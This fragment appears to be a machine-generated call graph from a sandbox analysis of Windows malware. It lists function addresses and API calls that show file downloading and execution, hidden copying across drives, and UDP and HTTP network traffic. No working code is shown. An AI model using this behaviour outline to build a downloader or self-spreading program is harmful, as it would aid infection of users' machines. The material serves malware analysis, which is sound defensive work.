4602 408d22 4600->4602 4603 408d24 memcpy 4600->4603 4601->4600 4602->4586 4604 40a720 4602->4604 4603->4600 4606 40a72c 4604->4606 4608 40a788 4606->4608 4610 408c70 _invalid_parameter 3 API calls 4606->4610 4611 40a74b 4606->4611 4612 40ac70 4606->4612 4626 4065e0 4606->4626 4609 408c70 _invalid_parameter 3 API calls 4608->4609 4609->4611 4610->4606 4611->4586 4611->4589 4613 40ac7f __aligned_recalloc_base 4612->4613 4614 408b20 __aligned_recalloc_base 7 API calls 4613->4614 4616 40ac89 4613->4616 4615 40ad18 4614->4615 4615->4616 4617 401000 7 API calls 4615->4617 4616->4606 4618 40ad2d 4617->4618 4619 401000 7 API calls 4618->4619 4620 40ad35 4619->4620 4622 40ad8d __aligned_recalloc_base 4620->4622 4629 40ac10 4620->4629 4634 401050 4622->4634 4625 401050 3 API calls 4625->4616 4742 4087d0 4626->4742 4630 4011e0 10 API calls 4629->4630 4631 40ac24 4630->4631 4640 4013e0 4631->4640 4633 40ac3c 4633->4620 4635 4010ae 4634->4635 4638 401064 _invalid_parameter 4634->4638 4635->4625 4636 40108c 4637 408c70 _invalid_parameter 3 API calls 4636->4637 4637->4635 4638->4636 4639 408c70 _invalid_parameter 3 API calls 4638->4639 4639->4636 4643 4012d0 4640->4643 4642 4013fa 4642->4633 4644 4012e4 4643->4644 4645 4010c0 __aligned_recalloc_base 10 API calls 4644->4645 4646 40132d 4645->4646 4647 4010c0 __aligned_recalloc_base 10 API calls 4646->4647 4648 40133d 4647->4648 4649 4010c0 __aligned_recalloc_base 10 API calls 4648->4649 4650 40134d 4649->4650 4651 4010c0 __aligned_recalloc_base 10 API calls 4650->4651 4652 40135d 4651->4652 4653 401366 4652->4653 4654 40138f 4652->4654 4658 402c20 4653->4658 4675 4029d0 4654->4675 4657 401387 _invalid_parameter 4657->4642 4659 401400 _invalid_parameter 7 API calls 4658->4659 4660 402c37 4659->4660 4661 401400 _invalid_parameter 7 API calls 4660->4661 4662 402c46 4661->4662 4663 401400 _invalid_parameter 7 API calls 4662->4663 4664 402c55 4663->4664 4665 401400 _invalid_parameter 7 API calls 4664->4665 4674 402c64 _invalid_parameter 4665->4674 4667 402e0f _invalid_parameter 4668 401430 _invalid_parameter 3 API calls 4667->4668 4669 402e35 _invalid_parameter 4667->4669 4668->4667 4670 401430 _invalid_parameter 3 API calls 4669->4670 4671 402e5b _invalid_parameter 4669->4671 4670->4669 4672 401430 _invalid_parameter 3 API calls 4671->4672 4673 402e81 4671->4673 4672->4671 4673->4657 4674->4667 4678 401430 4674->4678 4682 402e90 4675->4682 4677 4029ec 4677->4657 4679 401446 4678->4679 4680 40143b 4678->4680 4679->4674 4681 408c70 _invalid_parameter 3 API calls 4680->4681 4681->4679 4683 402ea6 _invalid_parameter 4682->4683 4684 402eb8 _invalid_parameter 4683->4684 4685 402edd 4683->4685 4687 402f03 4683->4687 4684->4677 4712 402880 4685->4712 4688 402f3d 4687->4688 4689 402f5e 4687->4689 4722 402a00 4688->4722 4691 401400 _invalid_parameter 7 API calls 4689->4691 4692 402f6f 4691->4692 4693 401400 _invalid_parameter 7 API calls 4692->4693 4694 402f7e 4693->4694 4695 401400 _invalid_parameter 7 API calls 4694->4695 4696 402f8d 4695->4696 4697 401400 _invalid_parameter 7 API calls 4696->4697 4698 402f9c 4697->4698 4735 402950 4698->4735 4700 401400 _invalid_parameter 7 API calls 4701 402fca _invalid_parameter 4700->4701 4701->4700 4703 403084 _invalid_parameter 4701->4703 4702 401430 _invalid_parameter 3 API calls 4702->4703 4703->4702 4704 4033a3 _invalid_parameter 4703->4704 4705 401430 _invalid_parameter 3 API calls 4704->4705 4706 4033c9 _invalid_parameter 4704->4706 4705->4704 4707 401430 _invalid_parameter 3 API calls 4706->4707 4708 4033ef _invalid_parameter 4706->4708 4707->4706 4709 401430 _invalid_parameter 3 API calls 4708->4709 4710 403415 _invalid_parameter 4708->4710 4709->4708 4710->4684 4711 401430 _invalid_parameter 3 API calls 4710->4711 4711->4710 4713 40288e 4712->4713 4714 401400 _invalid_parameter 7 API calls 4713->4714 4715 4028ab 4714->4715 4716 401400 _invalid_parameter 7 API calls 4715->4716 4717 4028ba _invalid_parameter 4716->4717 4718 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4717->4718 4719 40291a _invalid_parameter 4717->4719 4718->4717 4720 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4719->4720 4721 402940 4719->4721 4720->4719 4721->4684 4723 401400 _invalid_parameter 7 API calls 4722->4723 4724 402a17 4723->4724 4725 401400 _invalid_parameter 7 API calls 4724->4725 4726 402a26 4725->4726 4727 401400 _invalid_parameter 7 API calls 4726->4727 4734 402a35 _invalid_parameter 4727->4734 4728 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4728->4734 4729 402bc1 _invalid_parameter 4730 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4729->4730 4731 402be7 _invalid_parameter 4729->4731 4730->4729 4732 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4731->4732 4733 402c0d 4731->4733 4732->4731 4733->4684 4734->4728 4734->4729 4736 401400 _invalid_parameter 7 API calls 4735->4736 4737 40295f _invalid_parameter 4736->4737 4738 402880 _invalid_parameter 9 API calls 4737->4738 4739 402998 _invalid_parameter 4738->4739 4740 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4739->4740 4741 4029c3 4739->4741 4740->4739 4741->4701 4743 4087e2 4742->4743 4746 408730 4743->4746 4747 408b20 __aligned_recalloc_base 7 API calls 4746->4747 4754 408740 4747->4754 4750 408c70 _invalid_parameter 3 API calls 4752 4065ff 4750->4752 4751 40877c 4751->4750 4752->4606 4754->4751 4754->4752 4755 407c70 4754->4755 4762 408250 4754->4762 4767 408620 4754->4767 4756 407c83 4755->4756 4761 407c79 4755->4761 4757 407cc6 memset 4756->4757 4756->4761 4758 407ce7 4757->4758 4757->4761 4759 407ced memcpy 4758->4759 4758->4761 4775 407a40 4759->4775 4761->4754 4763 408267 4762->4763 4766 40825d 4762->4766 4764 40835f memcpy 4763->4764 4763->4766 4780 407f90 4763->4780 4764->4763 4766->4754 4769 408636 4767->4769 4773 40862c 4767->4773 4768 407f90 57 API calls 4770 4086b7 4768->4770 4769->4768 4769->4773 4771 407a40 6 API calls 4770->4771 4770->4773 4772 4086d6 4771->4772 4772->4773 4774 4086eb memcpy 4772->4774 4773->4754 4774->4773 4776 407a8e 4775->4776 4778 407a4e 4775->4778 4776->4761 4778->4776 4779 407980 6 API calls 4778->4779 4779->4778 4781 407fab 4780->4781 4783 407fa1 4780->4783 4781->4783 4786 407dd0 4781->4786 4783->4763 4785 407f90 57 API calls 4785->4783 4787 407ddd 4786->4787 4788 407de7 4786->4788 4787->4783 4787->4785 4788->4787 4789 407e70 4788->4789 4791 407e75 4788->4791 4792 407e58 4788->4792 4797 407730 4789->4797 4795 407a40 6 API calls 4791->4795 4794 407a40 6 API calls 4792->4794 4794->4789 4795->4789 4796 407f1c memset 4796->4787 4798 407749 4797->4798 4803 40773f 4797->4803 4799 407610 6 API calls 4798->4799 4798->4803 4800 407842 4799->4800 4801 408b20 __aligned_recalloc_base 7 API calls 4800->4801 4802 407891 4801->4802 4802->4803 4804 407490 44 API calls 4802->4804 4803->4787 4803->4796 4805 4078be 4804->4805 4806 408c70 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4805->4806 4806->4803 4826 408850 GetCurrentProcessId 4807->4826 4809 408b6b 4810 4089c0 __aligned_recalloc_base 5 API calls 4809->4810 4815 408b77 __aligned_recalloc_base 4809->4815 4810->4815 4811 404507 4811->4593 4811->4597 4812 408c20 HeapAlloc 4812->4815 4813 408bea HeapReAlloc 4813->4815 4814 408870 _invalid_parameter HeapValidate 4814->4815 4815->4811 4815->4812 4815->4813 4815->4814 4816 408c70 _invalid_parameter 3 API calls 4815->4816 4816->4815 4820 40ab8b 4817->4820 4818 408b20 __aligned_recalloc_base 7 API calls 4818->4820 4819 404596 4819->4597 4821 405c90 4819->4821 4820->4818 4820->4819 4822 408b20 __aligned_recalloc_base 7 API calls 4821->4822 4823 405ca0 4822->4823 4824 405ce7 4823->4824 4825 405cac memcpy CreateThread CloseHandle 4823->4825 4824->4597 4825->4824 4827 405bf0 4825->4827 4826->4809 4828 405c57 4827->4828 4834 405c01 4827->4834 4829 405c55 4828->4829 4830 40d4f0 60 API calls 4828->4830 4831 408c70 _invalid_parameter 3 API calls 4829->4831 4830->4829 4833 405c82 4831->4833 4832 405c10 StrChrA 4832->4834 4834->4829 4834->4832 4837 40d4f0 GetTickCount srand ExpandEnvironmentStringsW 4834->4837 4838 40d53e 4837->4838 4838->4838 4839 40d55c mbstowcs rand rand wsprintfW InternetOpenW 4838->4839 4840 40d760 InternetCloseHandle Sleep 4839->4840 4841 40d5f5 InternetOpenUrlW 4839->4841 4844 40d787 6 API calls 4840->4844 4862 405c3f Sleep 4840->4862 4842 40d753 InternetCloseHandle 4841->4842 4843 40d624 CreateFileW 4841->4843 4842->4840 4845 40d653 InternetReadFile 4843->4845 4846 40d746 CloseHandle 4843->4846 4847 40d809 wsprintfW DeleteFileW Sleep 4844->4847 4844->4862 4848 40d6a6 CloseHandle wsprintfW DeleteFileW Sleep 4845->4848 4849 40d677 4845->4849 4846->4842 4850 40d1d0 20 API calls 4847->4850 4867 40d1d0 CreateFileW 4848->4867 4849->4848 4851 40d680 WriteFile 4849->4851 4853 40d849 4850->4853 4851->4845 4855 40d853 Sleep 4853->4855 4856 40d887 DeleteFileW 4853->4856 4859 40d390 5 API calls 4855->4859 4856->4862 4857 40d739 DeleteFileW 4857->4846 4858 40d6fd Sleep 4860 40d390 5 API calls 4858->4860 4861 40d86a 4859->4861 4864 40d714 4860->4864 4861->4862 4865 40d87d ExitProcess 4861->4865 4862->4834 4863 40d730 4863->4846 4864->4863 4866 40d728 ExitProcess 4864->4866 4868 40d323 4867->4868 4869 40d217 CreateFileMappingW 4867->4869 4872 40d329 CreateFileW 4868->4872 4880 40d37a 4868->4880 4870 40d238 MapViewOfFile 4869->4870 4871 40d319 CloseHandle 4869->4871 4873 40d257 GetFileSize 4870->4873 4874 40d30f CloseHandle 4870->4874 4871->4868 4875 40d371 4872->4875 4876 40d34b WriteFile CloseHandle 4872->4876 4878 40d273 4873->4878 4879 40d305 UnmapViewOfFile 4873->4879 4874->4871 4877 408c70 _invalid_parameter 3 API calls 4875->4877 4876->4875 4877->4880 4887 40b1e0 4878->4887 4879->4874 4880->4857 4880->4858 4883 40ab80 7 API calls 4884 40d2be 4883->4884 4884->4879 4885 408c70 _invalid_parameter 3 API calls 4884->4885 4886 40d2fb 4885->4886 4886->4879 4888 40ac70 10 API calls 4887->4888 4889 40b204 4888->4889 4889->4879 4889->4883 4891 40c5ad htons inet_addr setsockopt 4890->4891 4898 40c6de 4890->4898 4892 409540 8 API calls 4891->4892 4893 40c626 bind lstrlenA sendto ioctlsocket 4892->4893 4897 40c67b 4893->4897 4894 40c6a2 4947 409600 shutdown closesocket 4894->4947 4897->4894 4899 408b60 9 API calls 4897->4899 4938 40c490 4897->4938 4898->4396 4899->4897 4954 40c260 memset InternetCrackUrlA InternetOpenA 4900->4954 4903 40cd4e 4903->4396 4905 408c70 _invalid_parameter 3 API calls 4905->4903 4909 40cd1b 4909->4905 4912 40cd11 SysFreeString 4912->4909 5061 409500 inet_addr 4915->5061 4918 4095ed 4923 40cfa0 4918->4923 4919 40959c connect 4920 4095b0 getsockname 4919->4920 4921 4095e4 4919->4921 4920->4921 5064 409600 shutdown closesocket 4921->5064 5065 4094e0 inet_ntoa 4923->5065 4925 40cfb6 4926 40b3e0 11 API calls 4925->4926 4927 40cfd5 4926->4927 4928 40d018 4927->4928 5066 40cd60 memset InternetCrackUrlA InternetOpenA 4927->5066 4928->4403 4931 40d00c 4933 408c70 _invalid_parameter 3 API calls 4931->4933 4932 408c70 _invalid_parameter 3 API calls 4932->4931 4933->4928 4936 408d94 4934->4936 4935 408d9a 4935->4397 4936->4935 4937 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 4936->4937 4937->4936 4946 40c4ac 4938->4946 4939 40c574 4939->4897 4940 40c4c8 recvfrom 4941 40c4f6 StrCmpNIA 4940->4941 4942 40c4e9 Sleep 4940->4942 4943 40c515 StrStrIA 4941->4943 4941->4946 4942->4946 4944 40c536 StrChrA 4943->4944 4943->4946 4948 40b290 4944->4948 4946->4939 4946->4940 4947->4898 4950 40b29b 4948->4950 4949 40b2a1 lstrlenA 4949->4950 4951 40b2b4 4949->4951 4950->4949 4950->4951 4952 408b20 __aligned_recalloc_base 7 API calls 4950->4952 4953 40b2d0 memcpy 4950->4953 4951->4946 4952->4950 4953->4950 4953->4951 4955 40c301 InternetConnectA 4954->4955 4956 40c477 4954->4956 4957 40c46a InternetCloseHandle 4955->4957 4958 40c33a HttpOpenRequestA 4955->4958 4956->4903 4967 40c000 4956->4967 4957->4956 4959 40c370 HttpSendRequestA 4958->4959 4960 40c45d InternetCloseHandle 4958->4960 4961 40c450 InternetCloseHandle 4959->4961 4963 40c38d 4959->4963 4960->4957 4961->4960 4962 40c3ae InternetReadFile 4962->4963 4964 40c3db 4962->4964 4963->4962 4963->4964 4965 408b60 9 API calls 4963->4965 4964->4961 4966 40c3f6 memcpy 4965->4966 4966->4963 4996 403fb0 4967->4996 4970 40c100 4970->4909 4977 40cbe0 4970->4977 4971 40c02a SysAllocString 4972 40c041 CoCreateInstance 4971->4972 4973 40c0f7 4971->4973 4974 40c0ed SysFreeString 4972->4974 4976 40c066 4972->4976 4975 408c70 _invalid_parameter 3 API calls 4973->4975 4974->4973 4975->4970 4976->4974 5013 40c110 4977->5013 4980 40cac0 5018 40c8e0 4980->5018 4985 40ca40 6 API calls 4986 40cb17 4985->4986 4992 40cb69 4986->4992 5035 40c860 4986->5035 4989 40cb4f 4989->4992 5040 40c200 4989->5040 4990 40c860 6 API calls 4990->4989 4992->4912 4993 40b3e0 4992->4993 5056 40b350 4993->5056 4999 403fbd 4996->4999 4997 403fc3 lstrlenA 4997->4999 5002 403fd6 4997->5002 4999->4997 5000 408b20 __aligned_recalloc_base 7 API calls 4999->5000 4999->5002 5003 408c70 _invalid_parameter 3 API calls 4999->5003 5004 403e90 4999->5004 5008 403f60 4999->5008 5000->4999 5002->4970 5002->4971 5003->4999 5005 403ea7 MultiByteToWideChar 5004->5005 5006 403e9a lstrlenA 5004->5006 5007 403ecc 5005->5007 5006->5005 5007->4999 5009 403f6b 5008->5009 5010 403f71 lstrlenA 5009->5010 5011 403e90 2 API calls 5009->5011 5012 403fa7 5009->5012 5010->5009 5011->5009 5012->4999 5016 40c136 5013->5016 5014 40c1db 5014->4909 5014->4980 5015 40c1b3 lstrcmpiW 5015->5016 5017 40c1cb SysFreeString 5015->5017 5016->5014 5016->5015 5016->5017 5017->5016 5020 40c906 5018->5020 5019 40ca1d 5019->4992 5030 40ca40 5019->5030 5020->5019 5021 40c993 lstrcmpiW 5020->5021 5022 40ca13 SysFreeString 5021->5022 5023 40c9a6 5021->5023 5022->5019 5024 40c200 2 API calls 5023->5024 5025 40c9b4 5024->5025 5025->5022 5026 40ca05 5025->5026 5027 40c9e3 lstrcmpiW 5025->5027 5026->5022 5028 40c9f5 5027->5028 5029 40c9fb SysFreeString 5027->5029 5028->5029 5029->5026 5031 40c200 2 API calls 5030->5031 5033 40ca5b 5031->5033 5032 40ca97 5032->4985 5032->4992 5033->5032 5034 40c8e0 6 API calls 5033->5034 5034->5032 5036 40c200 2 API calls 5035->5036 5038 40c87b 5036->5038 5037 40c8b7 5037->4989 5037->4990 5038->5037 5044 40c700 5038->5044 5041 40c226 5040->5041 5042 40c23d 5041->5042 5043 40c110 2 API calls 5041->5043 5042->4992 5043->5042 5046 40c726 5044->5046 5045 40c83d 5045->5037 5046->5045 5047 40c7b3 lstrcmpiW 5046->5047 5048 40c833 SysFreeString 5047->5048 5049 40c7c6 5047->5049 5048->5045 5050 40c200 2 API calls 5049->5050 5052 40c7d4 5050->5052 5051 40c825 5051->5048 5052->5048 5052->5051 5053 40c803 lstrcmpiW 5052->5053 5054 40c815 5053->5054 5055 40c81b SysFreeString 5053->5055 5054->5055 5055->5051 5060 40b35d 5056->5060 5057 40b300 _vscprintf wvsprintfA 5057->5060 5058 40b378 SysFreeString 5058->4912 5059 408b60 9 API calls 5059->5060 5060->5057 5060->5058 5060->5059 5062 40952c socket 5061->5062 5063 409519 gethostbyname 5061->5063 5062->4918 5062->4919 5063->5062 5064->4918 5065->4925 5067 40cf91 5066->5067 5068 40ce04 InternetConnectA 5066->5068 5067->4931 5067->4932 5069 40cf84 InternetCloseHandle 5068->5069 5070 40ce3d HttpOpenRequestA 5068->5070 5069->5067 5071 40ce73 HttpAddRequestHeadersA HttpSendRequestA 5070->5071 5072 40cf77 InternetCloseHandle 5070->5072 5073 40cf6a InternetCloseHandle 5071->5073 5076 40cebd 5071->5076 5072->5069 5073->5072 5074 40ced4 InternetReadFile 5075 40cf01 5074->5075 5074->5076 5075->5073 5076->5074 5076->5075 5077 408b60 9 API calls 5076->5077 5078 40cf1c memcpy 5077->5078 5078->5076 5085 405947 5079->5085 5080 4058c0 CoCreateInstance 5080->5085 5081 405b1b 5083 405b24 SysFreeString 5081->5083 5084 405b2e SysFreeString 5081->5084 5082 408c70 _invalid_parameter 3 API calls 5082->5081 5083->5084 5084->4406 5085->5080 5086 405a96 SysAllocString 5085->5086 5087 405962 5085->5087 5086->5085 5086->5087 5087->5081 5087->5082 5089 40a8ba 5088->5089 5090 40a8be 5088->5090 5089->4412 5092 40a870 CryptAcquireContextW 5090->5092 5093 40a8ab 5092->5093 5094 40a88d CryptGenRandom CryptReleaseContext 5092->5094 5093->5089 5094->5093 5095->4430 5135 409770 gethostname 5096->5135 5100 409a5c strstr 5101 409a6c 5100->5101 5102 409aad 5100->5102 5139 4094e0 inet_ntoa 5101->5139 5141 4094e0 inet_ntoa 5102->5141 5105 409abb strstr 5107 409acb 5105->5107 5108 409b0c EnterCriticalSection 5105->5108 5106 409a7a strstr 5109 409a49 5106->5109 5110 409a8a 5106->5110 5142 4094e0 inet_ntoa 5107->5142 5112 409b24 5108->5112 5109->4430 5140 4094e0 inet_ntoa 5110->5140 5120 409b4f 5112->5120 5144 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5112->5144 5114 409ad9 strstr 5114->5109 5116 409ae9 5114->5116 5115 409a98 strstr 5115->5102 5115->5109 5143 4094e0 inet_ntoa 5116->5143 5119 409c48 LeaveCriticalSection 5119->5109 5120->5119 5122 408b00 7 API calls 5120->5122 5121 409af7 strstr 5121->5108 5121->5109 5123 409b93 5122->5123 5123->5119 5145 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5123->5145 5125 409bb1 5126 409bd3 Sleep 5125->5126 5127 409bdd 5125->5127 5129 409c03 5125->5129 5126->5125 5128 408c70 _invalid_parameter 3 API calls 5127->5128 5128->5129 5129->5119 5146 409660 5129->5146 5131->4440 5133 409660 14 API calls 5132->5133 5134 409763 LeaveCriticalSection 5133->5134 5134->4432 5136 409797 gethostbyname 5135->5136 5137 4097b3 5135->5137 5136->5137 5137->5109 5138 4094e0 inet_ntoa 5137->5138 5138->5100 5139->5106 5140->5115 5141->5105 5142->5114 5143->5121 5144->5120 5145->5125 5147 409674 5146->5147 5154 40966f 5146->5154 5148 408b20 __aligned_recalloc_base 7 API calls 5147->5148 5149 409688 5148->5149 5150 4096e4 CreateFileW 5149->5150 5149->5154 5151 409733 InterlockedExchange 5150->5151 5152 409707 WriteFile FlushFileBuffers CloseHandle 5150->5152 5153 408c70 _invalid_parameter 3 API calls 5151->5153 5152->5151 5153->5154 5154->5119 5156 40bb2d 5155->5156 5157 40bb91 5156->5157 5158 40bb51 WaitForSingleObject 5156->5158 5157->4447 5157->4448 5158->5156 5159 40bb6c CloseHandle 5158->5159 5159->5156 5161 4043f9 memset GetModuleHandleW 5160->5161 5162 404432 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5161->5162 5162->5162 5163 404470 CreateWindowExW 5162->5163 5164 40449b 5163->5164 5165 40449d GetMessageA 5163->5165 5166 4044cf ExitThread 5164->5166 5167 4044b1 TranslateMessage DispatchMessageA 5165->5167 5168 4044c7 5165->5168 5167->5165 5168->5161 5168->5166 5190 40d180 CreateFileW 5169->5190 5171 405628 ExitThread 5173 4054d0 5173->5171 5174 405618 Sleep 5173->5174 5175 405509 5173->5175 5193 404cb0 GetLogicalDrives 5173->5193 5174->5173 5199 404c50 5175->5199 5178 405540 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5179 4055b6 wsprintfW 5178->5179 5180 4055cb wsprintfW 5178->5180 5179->5180 5205 404fc0 _chkstk 5180->5205 5181 40553b 5184 405d4f Sleep 5183->5184 5188 405d66 5184->5188 5185 405de6 Sleep 5185->5184 5186 405d7e Sleep wsprintfA 5258 40d440 InternetOpenA 5186->5258 5188->5185 5188->5186 5189 40d4f0 60 API calls 5188->5189 5189->5188 5191 40d1c8 5190->5191 5192 40d1af GetFileSize CloseHandle 5190->5192 5191->5173 5192->5191 5196 404cdd 5193->5196 5194 404d56 5194->5173 5195 404cec RegOpenKeyExW 5195->5196 5197 404d0e RegQueryValueExW 5195->5197 5196->5194 5196->5195 5198 404d4a RegCloseKey 5196->5198 5197->5196 5197->5198 5198->5196 5200 404ca9 5199->5200 5201 404c6c 5199->5201 5200->5178 5200->5181 5240 404bd0 GetDriveTypeW 5201->5240 5204 404c9b lstrcpyW 5204->5200 5206 404fd7 5205->5206 5207 404fde 6 API calls 5205->5207 5206->5181 5208 405092 5207->5208 5209 4050d4 PathFileExistsW 5207->5209 5212 40d180 3 API calls 5208->5212 5210 405150 PathFileExistsW 5209->5210 5211 4050e5 PathFileExistsW 5209->5211 5215 405161 5210->5215 5216 4051a6 FindFirstFileW 5210->5216 5213 4050f6 CreateDirectoryW 5211->5213 5214 405118 PathFileExistsW 5211->5214 5217 40509e 5212->5217 5213->5214 5219 405109 SetFileAttributesW 5213->5219 5214->5210 5220 405129 CopyFileW 5214->5220 5221 405181 5215->5221 5222 405169 5215->5222 5216->5206 5238 4051cd 5216->5238 5217->5209 5218 4050b5 SetFileAttributesW DeleteFileW 5217->5218 5218->5209 5219->5214 5220->5210 5224 405141 SetFileAttributesW 5220->5224 5226 404d70 3 API calls 5221->5226 5245 404d70 CoInitialize CoCreateInstance 5222->5245 5223 40528f lstrcmpW 5227 4052a5 lstrcmpW 5223->5227 5223->5238 5224->5210 5228 40517c SetFileAttributesW 5226->5228 5227->5238 5228->5216 5230 405466 FindNextFileW 5230->5223 5231 405482 FindClose 5230->5231 5231->5206 5232 4052eb lstrcmpiW 5232->5238 5233 405352 PathMatchSpecW 5234 405373 wsprintfW SetFileAttributesW DeleteFileW 5233->5234 5233->5238 5234->5238 5235 4053d0 PathFileExistsW 5236 4053e6 wsprintfW wsprintfW 5235->5236 5235->5238 5237 405450 MoveFileExW 5236->5237 5236->5238 5237->5230 5238->5223 5238->5230 5238->5232 5238->5233 5238->5235 5249 404e80 CreateDirectoryW wsprintfW FindFirstFileW 5238->5249 5241 404bf8 5240->5241 5243 404c0a 5240->5243 5242 404c0c QueryDosDeviceW 5241->5242 5241->5243 5242->5243 5244 404c26 StrCmpNW 5242->5244 5243->5200 5243->5204 5244->5243 5246 404da6 5245->5246 5248 404de2 5245->5248 5247 404db0 wsprintfW 5246->5247 5246->5248 5247->5248 5248->5228 5250 404ed5 lstrcmpW 5249->5250 5251 404faf 5249->5251 5252 404eeb lstrcmpW 5250->5252 5257 404f01 5250->5257 5251->5238 5253 404f03 wsprintfW wsprintfW 5252->5253 5252->5257 5256 404f66 MoveFileExW 5253->5256 5253->5257 5254 404f7c FindNextFileW 5254->5250 5255 404f98 FindClose RemoveDirectoryW 5254->5255 5255->5251 5256->5254 5257->5254 5259 40d466 InternetOpenUrlA 5258->5259 5260 40d4d8 Sleep 5258->5260 5261 40d485 HttpQueryInfoA 5259->5261 5262 40d4ce InternetCloseHandle 5259->5262 5260->5188 5263 40d4c4 InternetCloseHandle 5261->5263 5264 40d4ae 5261->5264 5262->5260 5263->5262 5264->5263 5422 40b950 5423 40b9be 5422->5423 5424 40b967 5422->5424 5424->5423 5425 40b971 5424->5425 5426 40b9c3 5424->5426 5427 40ba0d 5424->5427 5428 408b00 7 API calls 5425->5428 5430 40b9e8 5426->5430 5431 40b9db InterlockedDecrement 5426->5431 5455 40a5b0 5427->5455 5432 40b97e 5428->5432 5433 408c70 _invalid_parameter 3 API calls 5430->5433 5431->5430 5444 40e0a0 5432->5444 5435 40b9f4 5433->5435 5437 408c70 _invalid_parameter 3 API calls 5435->5437 5437->5423 5440 40b9ab InterlockedIncrement 5440->5423 5441 40a210 170 API calls 5442 40ba33 5441->5442 5442->5423 5442->5441 5460 40a6b0 5442->5460 5445 40e0a4 5444->5445 5446 40b990 5444->5446 5445->5446 5447 40e0b5 InterlockedIncrement 5445->5447 5448 4098f0 5446->5448 5447->5446 5449 409770 2 API calls 5448->5449 5450 4098ff 5449->5450 5451 409909 5450->5451 5452 40990d EnterCriticalSection 5450->5452 5451->5423 5451->5440 5453 40992c LeaveCriticalSection 5452->5453 5453->5451 5456 40a5c3 5455->5456 5457 40a5ed memcpy 5455->5457 5458 408b60 9 API calls 5456->5458 5457->5442 5459 40a5e4 5458->5459 5459->5457 5461 40a6d9 5460->5461 5462 40a6ce 5460->5462 5461->5462 5463 40a6f1 memmove 5461->5463 5462->5442 5463->5462 5676 40be90 5679 40dbd0 5676->5679 5678 40beb1 5680 40dbef 5679->5680 5693 40dce3 5679->5693 5681 408b20 __aligned_recalloc_base 7 API calls 5680->5681 5680->5693 5682 40dc16 memcpy htons 5681->5682 5683 40dcbc 5682->5683 5684 40dc66 sendto 5682->5684 5685 408c70 _invalid_parameter 3 API calls 5683->5685 5686 40dc85 InterlockedExchangeAdd 5684->5686 5687 40dcb8 5684->5687 5689 40dccb 5685->5689 5686->5684 5690 40dc9b 5686->5690 5687->5683 5688 40dcd9 5687->5688 5691 408c70 _invalid_parameter 3 API calls 5688->5691 5689->5678 5692 408c70 _invalid_parameter 3 API calls 5690->5692 5691->5693 5694 40dcaa 5692->5694 5693->5678 5694->5678 5695 40bf10 5705 40dd70 5695->5705 5697 40bf9d 5699 40bf1e 5699->5697 5700 40bf38 InterlockedExchangeAdd 5699->5700 5701 40bf7c WaitForSingleObject 5699->5701 5704 40a0b0 13 API calls 5699->5704 5717 409c80 EnterCriticalSection 5699->5717 5700->5699 5700->5701 5701->5699 5702 40bf95 5701->5702 5722 40dd00 5702->5722 5704->5699 5706 408b00 7 API calls 5705->5706 5707 40dd7b CreateEventA socket 5706->5707 5708 40ddb2 5707->5708 5709 40ddb7 5707->5709 5710 40dd00 8 API calls 5708->5710 5711 40de1a 5709->5711 5712 40ddbd bind 5709->5712 5710->5709 5711->5699 5713 40ddf0 5712->5713 5714 40ddfc CreateThread 5712->5714 5715 40dd00 8 API calls 5713->5715 5714->5711 5732 40dad0 5714->5732 5716 40ddf5 5715->5716 5716->5699 5718 409cb7 LeaveCriticalSection 5717->5718 5719 409c9f 5717->5719 5718->5699 5720 40a8b0 3 API calls 5719->5720 5721 409caa 5720->5721 5721->5718 5723 40dd04 5722->5723 5730 40dd60 5722->5730 5724 40dd0c SetEvent WaitForSingleObject CloseHandle 5723->5724 5723->5730 5725 40dd34 5724->5725 5731 40dd50 5724->5731 5728 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5725->5728 5725->5731 5727 40dd5a 5729 408c70 _invalid_parameter 3 API calls 5727->5729 5728->5725 5729->5730 5730->5697 5760 409600 shutdown closesocket 5731->5760 5733 40dae5 ioctlsocket 5732->5733 5734 40dbb0 5733->5734 5740 40db0a 5733->5740 5735 408c70 _invalid_parameter 3 API calls 5734->5735 5737 40dbb6 5735->5737 5736 40db99 WaitForSingleObject 5736->5733 5736->5734 5738 408b60 9 API calls 5738->5740 5739 40db34 recvfrom 5739->5736 5739->5740 5740->5736 5740->5738 5740->5739 5741 40db79 InterlockedExchangeAdd 5740->5741 5743 40d9a0 5741->5743 5744 40d9d5 5743->5744 5745 40d9ff 5744->5745 5746 408b00 7 API calls 5744->5746 5753 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5745->5753 5746->5745 5748 40da22 5754 40de30 5748->5754 5750 40dabe 5750->5740 5751 40da35 5751->5750 5752 40daab memmove 5751->5752 5752->5751 5753->5748 5755 40de42 5754->5755 5756 40de55 memcpy 5754->5756 5757 408b60 9 API calls 5755->5757 5758 40de71 5756->5758 5759 40de4f 5757->5759 5758->5751 5759->5756 5760->5727 5464 404955 5466 4048ce 5464->5466 5465 40495a LeaveCriticalSection 5466->5465 5467 408ce0 8 API calls 5466->5467 5468 40492c 5467->5468 5468->5465 5761 405315 5773 4052bb 5761->5773 5762 4052eb lstrcmpiW 5762->5773 5763 405466 FindNextFileW 5765 405482 FindClose 5763->5765 5766 40528f lstrcmpW 5763->5766 5764 405352 PathMatchSpecW 5767 405373 wsprintfW SetFileAttributesW DeleteFileW 5764->5767 5764->5773 5770 40548f 5765->5770 5769 4052a5 lstrcmpW 5766->5769 5766->5773 5767->5773 5768 4053d0 PathFileExistsW 5771 4053e6 wsprintfW wsprintfW 5768->5771 5768->5773 5769->5773 5772 405450 MoveFileExW 5771->5772 5771->5773 5772->5763 5773->5762 5773->5763 5773->5764 5773->5768 5774 404e80 11 API calls 5773->5774 5774->5773 5469 40b860 5470 4098f0 4 API calls 5469->5470 5471 40b873 5470->5471 5472 40b88a 5471->5472 5474 40b700 InterlockedExchangeAdd 